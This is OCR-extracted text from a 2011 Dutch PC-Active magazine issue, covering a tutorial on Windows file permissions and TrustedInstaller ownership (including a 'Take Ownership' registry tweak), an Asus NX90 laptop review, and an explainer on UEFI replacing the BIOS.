om een document in een gedeelde map te openen en te lezen, maar niet om dat document te wijzigen of te verwijderen. De Access Control List (ACL) die aan elk object is verbonden, bepaalt welke gebruikers toegang hebben en welke bewerkingen deze mogen uitvoeren. Door in te loggen met administratorrechten zult u over het algemeen weinig belemmeringen bij het doorvoeren van wijzigingen tegenkomen, maar zelfs de administrator loopt wel eens vast. Keuzevakjes blijven grijs of de toegang wordt geweigerd vanwege een ‘fout bij het toepassen van beveiligingsgegevens’. Enig inzicht in de werking van het toegangsbeheer kan veel verklaren (en oplossen).
Eigenschappen
Wat mag gebruiker Maarten wel of niet
24
U kunt de rechten voor het wijzigen van bestanden of mappen aan een gebruiker toekennen door in te loggen met een administratoraccount en in de Windows Verkenner met rechts op het bestand of de map te klikken. In het lijstje (het Verkenner-contextmenu) dat verschijnt, selecteert u Eigenschappen en vervolgens tabblad Beveiliging. In het venster Machtigingen leest u bij Objectnaam eerst de naam van de map of het bestand waar het om draait. Daaronder staan de namen van de gebruikers of gebruikersgroepen op het systeem. In het vak daar weer onder ziet u de machtigingen voor de groepen of gebruikers die u in het bovenste vak selecteert. Kiest u bijvoorbeeld gebruiker Maarten, dan krijgt u in de kolom Toestaan de vinkjes te zien die aangeven welke acties Maarten mag ondernemen. Voor de standaardgebruiker zullen dit gewoonlijk Lezen en uitvoeren en Lezen. Gaat het om een map dan komt hier nog het item Mapinhoud weergeven bij. Een overzicht van de machtigingen vindt u in tabel 1.
PC-ACTIVE | Nr. 245 – 2011
410 Toegangsbeheer 2.indd 24
10-02-2011 16:45:28
TOEGANGSBEHEER
| SOFTWARE
Volledig beheer
Gebruiker kan mapinhoud weergeven, bestanden openen en lezen, nieuwe bestanden en mappen maken of verwijderen, machtigingen wijzigen en eigenaar van bestanden worden.
Wijzigen
Gebruiker kan bestanden en mappen lezen, maken, veranderen en verwijderen, maar geen machtigingen wijzigen of eigenaar worden.
Lezen en uitvoeren
Gebruiker kan de inhoud van bestanden en mappen bekijken en programma’s in de map uitvoeren
Lezen
Gebruiker kan bestanden en mappen openen en de inhoud daarvan bekijken, bestandseigenschappen en machtingen lezen en bestanden synchroniseren
Schrijven
Gebruiker kan nieuwe bestanden en mappen maken, bestaande bestanden en mappen wijzigen, bestandseigenschappen en machtingen lezen en bestanden synchroniseren
Mapinhoud weergeven
Gebruiker mag door map bladeren
Speciale machtigingen
Gebruiker heeft speciale rechten uit menu Geavanceerd
Tabel 1: Machtigingen
De eenvoudigste optie is Volledig beheer, waarmee de beheerder in een keer alle machtigingen toewijst, maar ook per item zijn de opties aan- of uit te vinken. Geef hiervoor een vinkje in de lijst onder Toestaan om meer machtigingen te geven of een vinkje onder Weigeren om een machtiging in te trekken. Er zijn wel enkele regels aan verbonden. Instellingen als Mapinhoud weergeven weigeren en Lezen toestaan bijvoorbeeld sluiten elkaar uit en geven een foutmelding. Het is ook niet mogelijk een gebruiker die deel uitmaakt van twee groepen verschillende rechten tot dezelfde map te geven. Bestaande machtigingen zijn met een grijs vinkje weergegeven, nieuw ingegeven machtigingen worden aangegeven met een vet gemaakt vinkje. Op de Speciale machtigingen komen we later terug. Machtigingen voor een map gelden in eerste instantie ook voor alle bestanden in die map en alle submappen, totdat u anders beslist. Na een klik op Toepassen of OK worden de machtigingen doorgevoerd. Gaat het om een uitgebreide map met tientallen bestanden, dan ziet u in een apart venstertje even dat Windows de ACL’s aanpast. Het kan voorkomen dat een gebruiker of een account in een map nog niet bekend is. Dan klikt u op de knop Toevoegen om een nieuwe gebruiker of groep toe te voegen. U kunt dan de naam van een bestaand account intypen, deze via de knop Namen Controleren laten checken of deze opzoeken via de lastige omweg Andere gebruikers | Geavanceerd | Nu zoeken. Als de nieuwe gebruiker is toegevoegd, kunt u daarna direct zijn machtigingen instellen. U kunt ook een gebruiker verwijderen voor een object door deze te selecteren en op de knop Verwijderen te drukken. Deze heeft dan alleen nog de rechten van de groep waar hij mogelijk nog tot behoort.
afgescheiden. Bij de geavanceerde instellingen kunt u deze apart toestaan of weigeren. Een belangrijke daaronder is Eigenaar worden. Als u toestaat dat een gebruiker eigenaar wordt van een bestand of map, kan deze altijd de machtigingen voor dat bestand of die map wijzigen, ongeacht de al bestaande machtigingen voor het bestand of de map. Op het tabblad Eigenaar van de geavanceerde instellingen is te achterhalen wie de huidige eigenaar van een map of bestand is. Een gebruiker met de nodige permissie kan zich hier ook het eigendom van een object toe-eigenen. De eigenaar kan vervolgens de toegang tot zijn mappen en bestanden voor andere gebruikers, inclusief een administrator, verruimen of beperken. Ook de administrator kan dan even niet veel meer uitrichten, totdat deze, en dat is het prerogatief van de beheerder, zichzelf weer eigenaar maakt. Het eigenaarschap zomaar weggeven kan niet. De huidige eigenaar kan wel de machtiging Eigenaar
Geavanceerd Geeft u in het tabblad Machtigingen een dubbelklik op een accountnaam, dan krijgt u een overzicht van alle machtigingen van die gebruiker. Met een klik op de knop Bewerken komt u daarna in de uitgebreide lijst met instellingen voor de betreffende map en de geselecteerde gebruiker. Een aantal opties ziet u ook bij de standaardinstellingen, maar daar komen enkele extra opties bij die van de standaardopties zijn
Maarten krijgt extra rechten
PC-ACTIVE | Nr. 245 – 2011
410 Toegangsbeheer 2.indd 25
25
10-02-2011 16:45:43
SOFTWARE
| TOEGANGSBEHEER
worden verlenen aan een andere gebruiker, waarna die laatste de eigendomsrechten kan overnemen. Verder kan de administrator in het geavanceerde menu onderscheid maken tussen het aanmaken en verwijderen van mappen of submappen. Ook kan deze gebruikers expliciet toestaan of weigeren bestandskenmerken (bijvoorbeeld alleen-lezen of verborgen) te lezen en te schrijven. De bijzondere instellingen die u hier hebt opgegeven vindt u in het standaardscherm terug als Speciale machtiging. Bij het opslaan van de machtigingen in het geavanceerde scherm kunt u verder ook nog opgeven hoe ver u deze wilt doorvoeren. Onder Toepassen op: vindt u de keuzemogelijkheden Deze map, onderliggende mappen en bestanden, Alleen deze map, Deze map en bestanden, Alleen onderliggende mappen of Alleen bestanden. Dan treft u onder in het dialoogvenster ook nog de checkbox Deze machtigingen alleen toepassen op objecten en/of containers in deze container aan. Nogal verwarrend, want het is niet direct duidelijk wat deze optie toevoegt, te meer omdat Microsoft hier plotseling over containers spreekt. Het komt er echter op neer dat de eerste keuze onder Toepassen op wordt beperkt tot de huidige map inclusief de submappen daarin en zich niet uitstrekt tot de daarop volgende mappen en bestanden. Staat de gebruiker niet in het rijtje, dan kunt u deze weer opzoeken via de hierboven genoemde weg Andere gebruikers | Geavanceerd | Nu zoeken. Op het tabblad Effectieve machtigingen kunt u dan nog een gebruiker selecteren en zijn speciale machtigingen laten weergeven. Op dit scherm kunt u echter niets wijzigen. In de rijtjes bij de machtigingen kunt u steeds zowel de vakjes onder Toestaan als onder Weigeren aanvinken. De regel is dat Weigeren voorrang krijgt op Toestaan en ook wat niet expliciet is toegestaan, is verboden. Als u uitgaat van Weigeren zult u geen vinkjes meer zien bij Toestaan en wordt bij de geavanceerde machtigingsvermeldingen onder type Weigeren vermeld. Het is niet raadzaam beide typen machtiging door elkaar te gebruiken, omdat de uitwerking zo al snel ondoorzichtig wordt. Te meer ook omdat een tweede regel luidt dat de machtigingen uit een bovenliggende map die van de huidige map overschrijven. Microsoft adviseert zelfs alleen met de machtiging Toestaan te werken.
expliciete en overgenomen machtigingen. Expliciete machtigingen zijn machtigingen die u als beheerder direct zelf kunt configureren. Overgenomen machtigingen zijn machtigingen die automatisch aan een bestand of map worden doorgegeven door het bovenliggende object, bijvoorbeeld bij het aanmaken van een submap. Stuit u op een overgenomen machtiging, dan zult moeten nagaan van welk hoger niveau de machtigingen komen. Daarvoor klikt u in het tabblad Beveiliging op de knop Geavanceerd voor speciale machtigingen of geavanceerde instellingen. In het volgende venster Geavanceerde beveiligingsinstellingen ziet u op tabblad Machtigingen weer de objectnaam en de namen van de gebruikers plus hun belangrijkste machtiging. Daarnaast leest u van welke map of driveletter de machtigingen zijn overgenomen – de kolom Overgenomen van – en aan welke mappen deze worden doorgegeven – kolom Toepassen op. Selecteer nu de gebruiker waarvan u de rechten in de map of submap wilt aanpassen en druk op de knop Machtigingen wijzigen. Daarop kunt u in het venster het vinkje weghalen bij Overneembare machtigingen van het bovenliggende object opnemen. De koppeling is dan verbroken en de machtigingen van de bovenliggende map gaan niet meer voor. Als tweede optie kunt u met een vinkje ook regelen dat de nieuwe machtigingen wel of niet worden doorgegeven aan onderliggende objecten. Na een klik op OK krijgt u nog een pop-upvenstertje te zien van de Windows beveiliging met de keuze Toevoegen of Verwijderen. In het eerste geval zet u de overgenomen machtigingen om
Overgenomen machtigingen De kans bestaat dat bij het aanpassen van de rechten in een bepaalde map alle opties op grijs blijven staan. Waar het aan ligt, is in eerste instantie in het geheel niet duidelijk. De oorzaak komt pas aan het licht als u onder Bewerken probeert de gebruiker te verwijderen. U krijgt dan een uitgebreide melding van de Windows-beveiliging, waarin wordt uitgelegd dat het object zijn machtigingen ontleent aan een bovenliggend object en u het doorgeven van machtigingen dient uit te schakelen. Er blijken dus twee soorten machtigingen te bestaan:
26
Extra machtigingen
PC-ACTIVE | Nr. 245 – 2011
410 Toegangsbeheer 2.indd 26
10-02-2011 16:46:02
“MIJN ZUS LUISTERT NOOIT WANNEER IK HAAR ZEG ‘BE QUIET!’ TE ZIJN ...MAAR MIJN PC WEL.” Ruud Mathijssen
NEW STRAIGHT POWER E8 Fluister-Stil Top-Prestatie.
Zelf ontwikkelde SilentWings en een oranje rubberen ring die de fan van de behuizing ontkoppelt, maken van E8 een van de stilste in zijn Soort. Hier de Specs: Efficient tot 91 %: 80Plus zilver gecertificeerd DC/DC Technologie voor hoogste efficientie en stabiliteit Ultra Silent Concept met be quiet! SilentWings-Fan Hoogwaardig gesleevde kabels (tot 115 cm) en All in One kabel Meer informatie kan je vinden op www.be-quiet.nl!
in expliciete, in het tweede verwijdert u alle overgenomen machtigingen. In ons voorbeeld heeft gebruiker Maarten volledige rechten in de map pcatekst, maar u hebt liever niet dat hij zich bemoeit met de rubriek nieuwe tips. Door de automatische overname op te heffen, kunt u nu zijn rechten in de submap bijstellen en regelen dat hij alleen nog kan lezen of geen toegang meer heeft tot de map.
Trusted installer Het gebeurt wel eens dat u zelfs als administrator een bestand of map niet kunt verplaatsen, hernoemen of verwijderen. U ziet dan een melding als ‘U bent niet gemachtigd deze bewerking uit te voeren’ of ‘De toegang tot deze map is geweigerd’. De reden is dat die map of dat bestand worden beheerd door de Trusted Installer. Wie mag deze geheimzinnige figuur dan wel zijn? Welnu, Trusted Installer is in feite een Windowsinstallateur, ook Windows Module Installer genoemd. Microsoft spreekt liever over een dienst die te beginnen bij Vista deel uitmaakt van het nieuwe ‘service hardening’ veiligheidsbeleid met ACL’s (Access Control Lists). De Trusted Installer is bedoeld om te voorkomen dat een administrator of een programma (of erger malware of een rootkit) belangrijke systeembestanden overschrijft. Daarnaast maakt de Trusted Installer het Windows mogelijk (automatische) updates en hotfixes uit te voeren. Trusted Installer is de eigenaar van de meeste Windows programmafiles en mappen en ook van veel registry-sleutels. Om een bestand te wijzigen of te verwijderen dat in bezit is van TrustedInstaller, zult u zich dus eerst de rechten daarop moeten toe-eigenen. Erg moeilijk is dit echter
niet. Ga daartoe als administrator in de betreffende map weer via de route Eigenschappen | Beveiliging | Geavanceerd naar tabblad Eigenaar. Op het scherm leest u dat de huidige eigenaar Trustedinstaller is en in het kader daaronder welke eigenaren in aanmerking komen de rechten over te nemen. Na een klik op de knop Bewerken kunt u een nieuwe eigenaar aanwijzen en op OK klikken. Heeft een map een of meer submappen dan kunt u ook de optie Vervang de eigenaar van onderliggende containers en objecten aanvinken. Daarna kunt u de machtigingen voor de nieuwe eigenaar opnieuw instellen. Geeft u uzelf volledig beheer dan kunt u de bestanden eenvoudig verwijderen of verplaatsen. Het is echter niet aan te raden om nu meteen hele mappen die eigendom zijn van de TrustedInstaller in eigen beheer te nemen. Daarmee zou u het veiligheidsniveau omlaag halen.
Ingebouwde accounts Behalve de TrustedInstaller kunt u, als u bij de eigenschappen van een map kijkt, nog enkele andere gebruikers of accounts tegenkomen die u zelf nooit hebt aangemaakt. Zoals Geverifieerde gebruikers, SYSTEM, OWNER, Everyone, maar wat zijn dat voor groepen of accounts? De groep Geverifieerde gebruikers (Authenticated Users) omvat alle gebruikers die kunnen inloggen op het systeem, met uitzondering van de anonieme Gastaccount. De groep wordt beheerd door het besturingssysteem en is geen groep waaraan u zelf gebruikers kunt toevoegen. U kunt het account wel gebruiken om meerdere gebruikers tegelijk dezelfde machtigingen in een bepaalde map te geven. Het account SYSTEM wordt ingesteld door het besturingssysteem bij het installeren van een softwarepakket, zoals MS-Office, maar bijvoorbeeld ook Adobe Reader of Acronis TrueImage. Bij SYSTEM hoort volledig beheer en dat kan handig zijn om updates door te voeren. Door zelf eigenaar te worden en de machtigingen te veranderen loopt u de kans dat u geen updates meer kunt installeren. Andere groepen die u in het lijstje aantreft, hebben voornamelijk betrekking op gedeelde domeinen en netwerkbeheer. Zo kunt u in een openbare map de groep Iedereen toestemming geven bestanden te lezen, maar uzelf als Creator-Owner als enige machtigen de bestanden ook te verwijderen.
S
Take Ownership
Extra regel in de Verkenner contextmenu
28
Tot slot nog een fraaie registerhack. Misschien kent u hem al – hij bestaat al een tijdje, maar we willen hem u niet onthouden, want ook onder Windows 7 is hij nog steeds te gebruiken. Met een handige toevoeging van een aantal registersleutels krijgt u er in het contextmenu van de Verkenner de regel Take Ownership bij. Met één muisklik wordt u daarmee de baas over een map en hoeft u niet meer door de hele menustructuur van eigenschappen. Het tooltje is meestal als zip-file te downloaden. Na het uitpakken resteert alleen een dubbelklik op het bestandje take_ownership.reg, waar-
PC-ACTIVE | Nr. 245 – 2011
410 Toegangsbeheer 2.indd 28
10-02-2011 16:46:17
11-01
TOEGANGSBEHEER
mee het setje registersleutels aan het register wordt toegevoegd. Een van de vele vindplaatsen is: www. how-to-geek.com. Vergeet bij ingrijpen in het register niet eerst een back-up te maken. (bestand exporteren in de register-editor).
De sleutels waar het om gaat [HKEY_CLASSES_ROOT\*\shell\runas] @="Take Ownership" "NoWorkingDirectory"="" [HKEY_CLASSES_ROOT\*\shell\runas\command] @="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" "IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" [HKEY_CLASSES_ROOT\Directory\shell\runas] @="Take Ownership" "NoWorkingDirectory"="" [HKEY_CLASSES_ROOT\Directory\shell\ runas\command] @="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" "IsolatedCommand"="cmd.exe /c
Niet kunnen verwijderen Het komt voor. U wilt een bestand verwijderen, maar Windows steekt er ineens een stokje voor. Is dat bestand van een andere gebruiker en zijn de rechten niet gedeeld, dan is dat begrijpelijk, maar zelfs als administrator loopt u soms vast. Vaak treden dit soort problemen op na een upgrade van het besturingssysteem, als bestanden zijn gekopieerd van een ander systeem of omdat de gebruiker mappen heeft verplaatst naar een nieuwe partitie. Soms ook zit de dekselse Trusted Installer in de weg. Meestal zijn de problemen op te lossen door zelf eigenaar te worden en u zelf uitdrukkelijk alle rechten op een map of bestand toe te eigenen. Ook overgenomen machtigingen kunnen een actie verhinderen, maar na de erfenissen ongedaan te hebben gemaakt, bent u weer de baas. Toegangsbeheer is een complexe materie waar veel regels op elkaar ingrijpen en de ene regel prioriteit heeft boven de andere regel en dan hebben we netwerksituatie nog buiten beschouwing gelaten. Wilt u een en ander eens proberen, maak dan een testmap aan of neem een map waarin u weinig schade kunt aanrichten.
Adviespverkoo prijs € 283,–
Shuttle Barebone XS35GT • Nettop barebone die heel erg stil is omdat er geen fans nodig zijn • Maakt gebruik van de energiezuinige Atom-processor (dualcore!) • De Nvidia ION2-gpu zorgt voor probleemloze weergave van hd-materiaal!
Kijk voor meer informatie op www.shuttle.eu29 PC-ACTIVE | Nr. 245 – 2011
Een laptop is een laptop. Zo simpel is het toch? Van die aanname blijft niets over als we de Asus NX90 uitpakken. Groot en opvallend vormgegeven, met – volgens de fabrikant – een uitmuntende geluidskwaliteit. De term ‘verplaatsbare desktop’ is de typering voor deze computer.
D
e styling van de Asus NX90 is behoorlijk anders dan we van het Taiwanese merk gewend zijn. Doelmatigheid is daar toch vaak wel duidelijk het streven geweest in de ontwerpen. Echt mooi is het zelden. De NX90 is anders en vertoont overduidelijk overeenkomsten
met de ontwerpen die we van het Deense audio- en videomerk Bang & Olufsen kennen. Strakke, duidelijke lijnen. Glimmend chroom, gecombineerd met mat zwart. De pennenstreken voor de NX90 zijn op het papier geplaatst door David Lewis. Niet Bang en Olufsen dus, maar dat bedrijf is wel de belangrijkste klant van het Lewis’ ontwerpbureau. Lewis is verantwoordelijk voor een aantal B&Oproducten. Bij het ontwerpen van het uiterlijk van de NX90 heeft Lewis geprobeerd een simplificatie te bewerkstelligen van een in wezen ‘ingewikkeld’ product. Zijn idee was dat het ontwerp er voor moest zorgen dat het gemakkelijker wordt om met een machine als de NX90 te werken. Verder vindt Lewis een schoon en opgeruimd ontwerp belangrijk.
Deense stijl
Asus NX90
30
Met het idee van een schoon en opgeruimd ontwerp zijn we het van harte eens. De lijnen van de NX90 zijn strak, het achterpaneel is groot en glimmend en dat design wordt doorgezet in de polssteun onder het toetsenbord. Daar boven bevindt zich het ruime toetsenbord, dat gekenmerkt wordt door forse
PC-ACTIVE | Nr. 245 – 2011
305 Asus NX90.indd 30
10-02-2011 15:09:29
ASUS NX90
| HARDWARE
toetsen. Strak en hoeking: typisch de Deense stijl van B&O. Bovendien is het ook nog eens opvallend comfortabel. Het full hd-scherm is groot met zijn doorsnede van bijna 47 cm (18,4 inch). Wel glimt het veel en heeft het een beetje een beperkte kijkhoek, dat waarschijnlijk te wijten is aan de keuze voor een op TN-technologie gebaseerd scherm. Langs de zijkanten van het scherm bevinden zich de luidsprekers. De positie hiervan maakt het scherm wel groter dan het onderste gedeelte wat het verplaatsen van de NX90 lastig maakt. Pakt u het systeem langs de luidsprekers vastpakt, dan klapt de onderkant er onder uit.
Twee touchpads Naast het grote scherm en de smallere basis valt het ontwerp van de NX90 ook nog op een ander punt op. Want hoewel er een forse polssteun onder het toetsenbord is geplaatst, is daar geen touchpad te vinden. Lewis vond klaarblijkelijk de gewone plaats van het touchpad niet doordacht en heeft er niet één, maar twee in het ontwerp verwerkt. Eentje links en eentje rechts van het toetsenbord. Dat is op zijn minst inventief, maar in de praktijk is het wel enorm wennen. Wellicht dat Lewis het erg handig vindt, maar wij haalden toch maar even een muis uit de kast om de test te volbrengen. Technisch gezien is het een krachtig apparaat: een Intel Core i7-740QM quadcore-processor, 6 GB werkgeheugen en een Nvidia Geforce GT335M-videokaart. Dat zijn mooie specificaties, maar met de komst van de tweede generatie Intel Core i7 inmiddels wel een beetje verouderd. Asus heeft maarliefst twee harde schijven van 640 GB in de laptop gestopt. Dat is goed voor 1,28 TB opslag! Een blu-rayspeler is standaard. De accu van deze laptop is erg beperkt. Dankzij de wel heel erg beperkte werktijd kunnen we beter spreken over een ingebouwde noodvoeding… Hoewel de NX90 niet echt van Bang & Olufsen afkomstig is, heeft het bedrijf wel wat met het product te maken gehad. De Deense techneuten hebben geholpen bij het ontwerp van het audiosysteem. ICEpower by B&O heet het systeem: het moet het geluid wat meer oppompen bij de weergave. Daarnaast heeft Asus bij de NX90 gekozen voor wat betere audiocomponenten. Zo heeft een standaardlaptop vaak maar een erg beperkte versterker. 2 tot 3 W is vaak het maximum, maar voor de NX90 is gekozen voor 11 W. Daarnaast zijn de luidsperkers veel groter dan normaal: 3,2 cm. Asus heeft ook een ruimere kamer ontworpen van 108 cc. Dat is aanmerkelijk meer dan bij een standaardlaptop.
Theorie vs. praktijk Al die mooie getallen zijn natuurlijk leuk om te lezen, maar hoe functioneert een systeem als de NX90 in de praktijk? We trokken ons terug met deze forse laptop
De luidsprekers vallen buiten de footprint
en pakten een behoorlijke muziekcollectie. De audiokwaliteit van de NX90 wordt behoorlijk ondermijnd door de machine zelf, want hoewel hij niet luidruchtig is, is het gezoem van de machine zelf vooral tijdens zachtere passages bij klassieke muziek duidelijk te horen. Toch is de geluidskwaliteit veel beter dan we gewend zijn van laptops. De meeste modellen zijn eigenlijk niet om aan te horen en eigenlijk alleen goed genoeg om de systeemgeluiden van Windows weer te geven. Met een goede muziekweergave heeft het vaak weinig of niets te maken. De Asus NX90 doet het stukken beter, zolang u zich maar recht voor het scherm bevindt. Toch lijken de lage tonen onvoldoende ontwikkeld te zijn, waardoor de weergave wat aan de matte kant is. Als u het apparaat zou gebruiken als een vervanging van een audiosysteem dat de ruimte moet vullen met muziek of filmgeluid, dan schiet het apparaat gewoon tekort. Zelfs een kleine ruimte is nog te groot. Ook als het volume omhoog wordt geschroefd, heeft de NX90 moeite om het bij te benen, wat voor wat gekraak bij de weergave zorgt. Nee, dan kunt u beter voor een paar echte luidsprekers kiezen.
Ten slotte De Asus NX90 is een bijzondere laptop. Nu ja, meer een verplaatsbare desktop met een ingebouwde noodvoeding. De Deense ontwerper David Lewis heeft een eigenzinnig ontwerp afgeleverd, dat prima past in de stijl van Bang & Olufsen. Jammer is wel dat de audiokwaliteit wat tegenvalt. En het scherm had een betere kijkhoek mogen hebben.
INFORMATIE ASUS NX90 Adviesprijs: website:
€ 2.499 www.asus.nl
PC-ACTIVE | Nr. 245 – 2011
305 Asus NX90.indd 31
31
10-02-2011 15:09:49
MODERNE OPVOLGING VAN HET BIOS
UEFI TEKST : FILIP VERVLOESEM
Huidige pc’s lijken amper nog op hun primitieve voorgangers uit de jaren tachtig, op één component na: het bios. Dat is nauwelijks veranderd in al die jaren en de opvolger staat dan ook te trappelen: uefi. We bekijken voor u de voordelen van uefi en leggen uit waarop u moet letten als u een uefi-pc wilt installeren.
T
egenwoordig is de belangrijkste taak van het bios het opstarten van een besturingssysteem. Daarvoor moeten verschillende componenten van uw pc worden geïnitialiseerd (toetsenbord, beeldscherm, netwerkkaart, schijven, ...) en moet er worden gezocht naar bootloadercode in het master boot record (mbr) van een schijf. Vroeger verliep alle communicatie tussen het besturingssysteem (bijvoorbeeld Ms-dos) en de hardware ook via het bios, maar moderne besturingssystemen benaderen de hardware rechtstreeks via hun eigen device drivers. En hoewel het bios op het eerste zicht zijn taak nog prima vervult, heeft het toch een aantal nadelen: - het draait in zogenaamde ‘real mode’, waarbij de cpu in 16-bits modus werkt met 20-bits geheugenadressering. Er kan dus slechts 1.048.576 bytes (=220) geheugen (ca. 1 MB van het ram) worden gebruikt. Dit zijn de hardwarematige limieten die nog stammen uit de tijd van de originele IBM-pc. - alle drivers die vóór het starten van het besturingssysteem moeten worden geladen (bijvoorbeeld voor een hardware raid-controller) zijn ook beperkt tot 16-bits en kunnen zelfs maar 64 kB (=216 bytes) aan geheugen aanspreken. - het is volledig geschreven in assembler en daarmee architectuurafhankelijk: voor elke processorarchitectuur moet een aparte bios-versie worden ontwikkeld. - het is weinig modulair opgebouwd en niet gestandaardiseerd (verschillende fabrikanten hebben hun eigen bios-implementatie).
Uefi Omwille van de beperkingen uit de beginjaren van het bios is het ondertussen behoorlijk moeilijk gewor-
32
den om de nieuwste hardware te ondersteunen. Om die reden is Intel reeds eind jaren negentig begonnen aan een alternatief voor het bios, oorspronkelijk voor servers gebaseerd op de Itanium-architectuur en onder de naam ‘Intel Boot Initiative’. Later werd dit hernoemd tot ‘Extensible Firmware Interface’ of efi, dat ook op x86-machines werd geïmplementeerd. Vanaf 2005 wordt Intels efi-standaard verder ontwikkeld door het Unified EFI-forum, waarin alle belangrijke marktspelers zetelen (zoals Intel, AMD, IBM, HP en Microsoft) en men spreekt dus van uefi. Voor fabrikanten heeft uefi meteen al één groot voordeel ten opzichte van het klassieke bios: door de modulaire en platformonafhankelijke opbouw én het gebruik van de programmeertaal C in plaats van assembler is de ontwikkeling veel eenvoudiger en dus goedkoper.
Nadelen bios Daarvan ligt u als gebruiker misschien niet direct wakker, maar door het wegvallen van een aantal historische beperkingen biedt uefi heel wat nieuwe mogelijkheden: - kortere opstarttijden: bij moderne computers moet u soms langer wachten op de bootloader dan dat het besturingssysteem zélf nodig heeft om te starten. Phoenix heeft een geoptimaliseerde uefi-implementatie getoond die na amper 1 seconde al overgaat tot het starten van Windows (zie hyperlinks). - ondersteuning voor grotere schijven: op een uefisysteem kunt u met gpt-partitionering ook booten van schijven groter dan 2 TB, althans in de 64-bits versies van Windows Vista en 7. - moderne interface: uefi biedt ondersteuning voor grafische interfaces die u met de muis bestuurt in plaats van de klassieke tekstgebaseerde biosinterfaces.
PC-ACTIVE | Nr. 245 – 2011
306 Intel-moederbord.indd 32
10-02-2011 16:48:35
UEFI
- met de ingebouwde uefi boot manager hebt u geen extra bootloader meer nodig in een multiboot-omgeving, al kunt u die nog steeds installeren. - met de uefi shell kunt u uefi-applicaties starten voordat er een besturingssysteem is geladen. Uefiapplicaties hebben toegang tot alle mogelijkheden van uw hardware: 64-bits cpu- en geheugenondersteuning, netwerkmogelijkheden, et cetera.
Vendor support Efi werd al in 2000 geïntroduceerd in topsegementworkstations en -servers met de Itanium-architectuur van Intel en HP. Pas in 2006 werd efi toegepast in consumenten-pc’s. Vanaf 2008 begonnen andere fabrikanten ook over te stappen op uefi, waarbij de servermodellen eerst aan bod kwamen. Ondertussen kunt u ook al heel wat desktops en laptops vinden met uefi-ondersteuning, al is dat niet altijd onmiddellijk duidelijk. De technische specificaties van moederborden vermelden het niet altijd als uefi wordt gebruikt en sommige uefi-systemen hebben nog steeds een tekstgebaseerde bios-interface. Bovendien is de overgang van volledig bios-gebaseerde systemen naar volledig uefi-gebaseerde systemen een stapsgewijs proces, waarbij we 4 verschillende platformen kunnen onderscheiden: - Class Zero: traditionele bios-gebaseerde systemen - Class One: efi-gebaseerd systeem met een zogenaamde Compatibility Support Module (of CSM) voor bios-emulatie. Voor het besturingssysteem doet efi zich uitsluitend voor als een klassiek bios en efi’s extra mogelijkheden zijn nog niet beschikbaar. - Class Two: uefi-gebaseerd systeem dat via de uefi bootloader een besturingssysteem kan booten. Ook
| HARDWARE
de uefi Shell met extra uefi-applicaties behoren tot de mogelijkheden, terwijl u via de optionele CSM nog steeds oudere besturingssystemen kunt booten. De meeste hedendaagse uefi-systemen behoren tot deze klasse. - Class Three: uefi-gebaseerd systeem zónder CSM. Een bios-boot hoort daardoor tot het verleden: u kunt alleen besturingssystemen installeren die uefiboot ondersteunen.
Systemen met uefi Enkele voorbeelden van uefi-systemen voor thuisgebruik zijn: - de nieuwste HP ProBook, EliteBook en Compaqnotebooks, alsook de tablet pc’s van HP - de laatste generatie Asus-moederborden met de Intel P67-chipset (voor Sandy Bridge-processors) - moederborden van MSI met het zogenaamde ‘Click bios’ - moederborden die gebruikmaken van AMI’s Aptio of Phoenix’ SecureCore - de nieuwste Intel-moederborden Dit zijn zeker niet de enige beschikbare uefi-systemen: sinds eind vorig jaar lijkt uefi aan een sterke opmars bezig te zijn in de consumentenmarkt. Ook kan een bios-update voor oudere moederborden uefiondersteuning toevoegen: dat is bijvoorbeeld voor de Asus P5Q Deluxe gebeurd (zie hyperlinks).
OS-ondersteuning Belangrijk om weten is dat niet elk besturingssysteem zomaar via uefi kan booten. Windows Vista SP1 en Windows 7 kunnen via uefi booten, maar dat geldt
Apple en uefi Met Apple’s overstap van PowerPC- naar Intel-processors in 2006 werd ook het oudere Open Firmware vervangen door efi. Elke Mac OS X-installatie heeft dus ook een (voor de gebruiker verborgen) efi system partition (esp):$ diskutil /dev/disk0 #: 0: 1: 2:
list TYPE NAME GUID_partition_scheme EFI Apple_HFS MacBook HD
SIZE *500,1 GB 209,7 MB 499,8 GB
IDENTIFIER disk0 disk0s1 disk0s2
In tegenstelling tot Windows- en Linux-systemen bevat Apple’s esp géén bootloader, maar enkel een tool om firmware te updaten (SmcFlasher.efi): $ sudo mount -t msdos /dev/disk0s1 /Volumes/ESP $ find /Volumes/ESP -type f /Volumes/ESP/EFI/APPLE/EXTENSIONS/Firmware.scap /Volumes/ESP/EFI/APPLE/FIRMWARE/SmcFlasher.efi /Volumes/ESP/EFI/APPLE/FIRMWARE/k36a.smc
De eigenlijke bootloader bevindt zich op de Mac OS X-systeempartitie (/System/Library/CoreServices/boot.efi). Ook bios-emulatie is aanwezig, zodat u met Boot Camp op een Mac ook Windows-versies zónder efi-ondersteuning kunt installeren.
PC-ACTIVE | Nr. 245 – 2011
306 Intel-moederbord.indd 33
33
10-02-2011 16:49:08
HARDWARE
| UEFI
Moderne Intel-borden hebben uefi met bios-emulatie aan boord
alleen voor de 64-bits versies. Op die systemen kunt u bovendien van een gpt-gepartitioneerde schijf booten (zie het artikel over GPT in PC-Active 240), dus een uefi-moederbord met een 64-bits Windows Vista of 7 is de enige manier om een schijf van méér dan 2 TB als bootschijf te gebruiken. Toch moet u goed opletten bij de installatie van Windows, want de Compatibility Support Module van de huidige Class Two uefisystemen kan de Windows installatie-dvd om de tuin leiden. Die dvd bevat immers bootloaders voor biosén voor uefi-systemen: u moet de dvd dus expliciet in uefi-modus opstarten om een uefi-installatie uit te voeren. Doet u dat niet, dan wordt het systeem op de klassieke manier geïnstalleerd (met bios-bootloader en mbr-partitionering), ook al hebt u eigenlijk een uefi-bord! Dergelijke installatie kunt u achteraf ook niet booten in uefi-modus.
